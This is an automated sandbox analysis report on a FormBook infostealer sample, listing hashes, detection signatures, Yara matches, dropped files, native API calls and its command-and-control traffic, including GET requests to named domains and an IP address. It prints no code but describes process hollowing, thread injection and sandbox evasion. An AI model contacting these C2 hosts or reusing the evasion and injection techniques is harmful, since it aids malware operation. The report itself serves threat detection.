Analysis Report kayx.exe

Overview

General Information

Sample Name: kayx.exe
Analysis ID: 321226
MD5: a80e73a824b655491f54278b7a29467d
SHA1: f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256: bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
Tags: exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: kayx.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Avira: detection malicious, Label: TR/Dropper.MSIL.blecg
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: kayx.exe Virustotal: Detection: 34% Perma Link
Source: kayx.exe ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: kayx.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 17.2.kayx.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.kayx.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\kayx.exe Code function: 4x nop then pop edi 17_2_0040C122
Source: C:\Users\user\Desktop\kayx.exe Code function: 4x nop then pop edi 17_1_0040C122

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1Host: www.ghoster.agencyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1Host: www.jibenentreprenad.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 184.168.131.241 184.168.131.241
Source: Joe Sandbox View IP Address: 184.168.131.241 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1Host: www.ghoster.agencyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1Host: www.jibenentreprenad.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.ghoster.agency
Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmp String found in binary or memory: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: firefoxe.exe, 00000013.00000002.483426018.000000000108B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C4AAF0 NtUnmapViewOfSection, 1_2_05C4AAF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C4AAE8 NtUnmapViewOfSection, 1_2_05C4AAE8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417B90 NtCreateFile, 17_2_00417B90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417C40 NtReadFile, 17_2_00417C40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417CC0 NtClose, 17_2_00417CC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417D70 NtAllocateVirtualMemory, 17_2_00417D70
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417B4A NtCreateFile, 17_2_00417B4A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417BE2 NtCreateFile, 17_2_00417BE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417B8A NtCreateFile, 17_2_00417B8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417CBF NtClose, 17_2_00417CBF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk, 17_2_00E498F0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_00E49860
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49840 NtDelayExecution,LdrInitializeThunk, 17_2_00E49840
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E499A0 NtCreateSection,LdrInitializeThunk, 17_2_00E499A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_00E49910
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A50 NtCreateFile,LdrInitializeThunk, 17_2_00E49A50
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A20 NtResumeThread,LdrInitializeThunk, 17_2_00E49A20
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk, 17_2_00E49A00
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E495D0 NtClose,LdrInitializeThunk, 17_2_00E495D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49540 NtReadFile,LdrInitializeThunk, 17_2_00E49540
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_00E496E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_00E49660
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49FE0 NtCreateMutant,LdrInitializeThunk, 17_2_00E49FE0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk, 17_2_00E497A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49780 NtMapViewOfSection,LdrInitializeThunk, 17_2_00E49780
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49710 NtQueryInformationToken,LdrInitializeThunk, 17_2_00E49710
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E498A0 NtWriteVirtualMemory, 17_2_00E498A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4B040 NtSuspendThread, 17_2_00E4B040
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49820 NtEnumerateKey, 17_2_00E49820
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E499D0 NtCreateProcessEx, 17_2_00E499D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49950 NtQueueApcThread, 17_2_00E49950
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A80 NtOpenDirectoryObject, 17_2_00E49A80
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A10 NtQuerySection, 17_2_00E49A10
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4A3B0 NtGetContextThread, 17_2_00E4A3B0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49B00 NtSetValueKey, 17_2_00E49B00
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E495F0 NtQueryInformationFile, 17_2_00E495F0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49560 NtWriteFile, 17_2_00E49560
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49520 NtWaitForSingleObject, 17_2_00E49520
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4AD30 NtSetContextThread, 17_2_00E4AD30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E496D0 NtCreateKey, 17_2_00E496D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49670 NtQueryInformationProcess, 17_2_00E49670
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49650 NtQueryValueKey, 17_2_00E49650
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49610 NtEnumerateValueKey, 17_2_00E49610
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49760 NtOpenProcess, 17_2_00E49760
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49770 NtSetInformationFile, 17_2_00E49770
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4A770 NtOpenThread, 17_2_00E4A770
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49730 NtQueryVirtualMemory, 17_2_00E49730
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4A710 NtOpenProcessToken, 17_2_00E4A710
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417B90 NtCreateFile, 17_1_00417B90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417C40 NtReadFile, 17_1_00417C40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417CC0 NtClose, 17_1_00417CC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417D70 NtAllocateVirtualMemory, 17_1_00417D70
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417B4A NtCreateFile, 17_1_00417B4A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417BE2 NtCreateFile, 17_1_00417BE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417B8A NtCreateFile, 17_1_00417B8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417CBF NtClose, 17_1_00417CBF
Detected potential crypto function
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_01850C1C 1_2_01850C1C
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C42938 1_2_05C42938
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C46D00 1_2_05C46D00
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C46D10 1_2_05C46D10
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C426C0 1_2_05C426C0
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C426B1 1_2_05C426B1
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C42987 1_2_05C42987
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00401030 17_2_00401030
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041B091 17_2_0041B091
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408A30 17_2_00408A30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00402D87 17_2_00402D87
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00402D90 17_2_00402D90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041BE80 17_2_0041BE80
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041BE8A 17_2_0041BE8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041C6AB 17_2_0041C6AB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_0041C7F2 17_2_0041C7F2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00402FB0 17_2_00402FB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED28EC 17_2_00ED28EC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED20A8 17_2_00ED20A8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B090 17_2_00E1B090
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EDE824 17_2_00EDE824
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1002 17_2_00EC1002
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0F900 17_2_00E0F900
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED22AE 17_2_00ED22AE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBFA2B 17_2_00EBFA2B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC03DA 17_2_00EC03DA
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECDBD2 17_2_00ECDBD2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3EBB0 17_2_00E3EBB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AB40 17_2_00E2AB40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED2B28 17_2_00ED2B28
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECD466 17_2_00ECD466
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1841F 17_2_00E1841F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1D5E0 17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED25DD 17_2_00ED25DD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED1D55 17_2_00ED1D55
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E00D20 17_2_00E00D20
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED2D07 17_2_00ED2D07
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED2EF7 17_2_00ED2EF7
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E26E30 17_2_00E26E30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECD616 17_2_00ECD616
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED1FF1 17_2_00ED1FF1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EDDFCE 17_2_00EDDFCE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00401030 17_1_00401030
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041B091 17_1_0041B091
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00408A30 17_1_00408A30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00402D87 17_1_00402D87
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00402D90 17_1_00402D90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041BE80 17_1_0041BE80
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041BE8A 17_1_0041BE8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041C6AB 17_1_0041C6AB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_0041C7F2 17_1_0041C7F2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00402FB0 17_1_00402FB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Code function: 19_2_01060C1C 19_2_01060C1C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\kayx.exe Code function: String function: 00419A40 appears 38 times
Source: C:\Users\user\Desktop\kayx.exe Code function: String function: 00E0B150 appears 54 times
Sample file is different than original file name gathered from version info
Source: kayx.exe, 00000001.00000002.355661594.00000000059B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs kayx.exe
Source: kayx.exe, 00000001.00000002.351671330.0000000000F28000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000001.00000002.352304174.000000000333A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameClassLibrary3.dll< vs kayx.exe
Source: kayx.exe, 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKlghppetippu.dll4 vs kayx.exe
Source: kayx.exe, 0000000F.00000002.349503948.0000000000268000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000010.00000002.350319835.0000000000328000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397054523.000000000108F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs kayx.exe
